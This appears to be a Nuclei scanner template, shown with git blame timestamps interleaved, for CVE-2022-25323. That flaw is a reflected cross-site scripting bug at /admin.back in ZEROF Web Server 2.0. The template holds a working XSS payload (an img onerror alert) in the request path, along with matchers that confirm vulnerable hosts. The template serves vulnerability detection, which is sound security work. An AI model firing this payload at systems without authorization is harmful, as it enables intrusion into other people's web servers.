2022-02-19 22:32:01 +00:00
|
|
|
id: CVE-2022-25323
|
|
|
|
|
|
|
|
info:
|
2022-03-07 21:36:44 +00:00
|
|
|
name: ZEROF Web Server 2.0 Cross-Site Scripting
|
2022-02-19 22:32:01 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2022-03-08 01:08:46 +00:00
|
|
|
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
|
2022-02-19 22:32:01 +00:00
|
|
|
reference:
|
2022-02-22 08:39:05 +00:00
|
|
|
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
|
2022-02-19 22:32:01 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://awillix.ru
|
2022-02-25 18:40:49 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2022-02-25 18:40:49 +00:00
|
|
|
cve-id: CVE-2022-25323
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: xss,cve,cve2022,zerof
|
2022-02-19 22:32:01 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-02-22 08:39:05 +00:00
|
|
|
- "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
|
2022-02-19 22:32:01 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-02-22 08:39:05 +00:00
|
|
|
- 'back<img src=x onerror=alert(document.domain)>'
|
2022-05-12 08:18:54 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
2022-02-19 22:32:01 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-02-19 22:32:56 +00:00
|
|
|
- 401
|
2022-03-07 21:36:44 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/03/07
|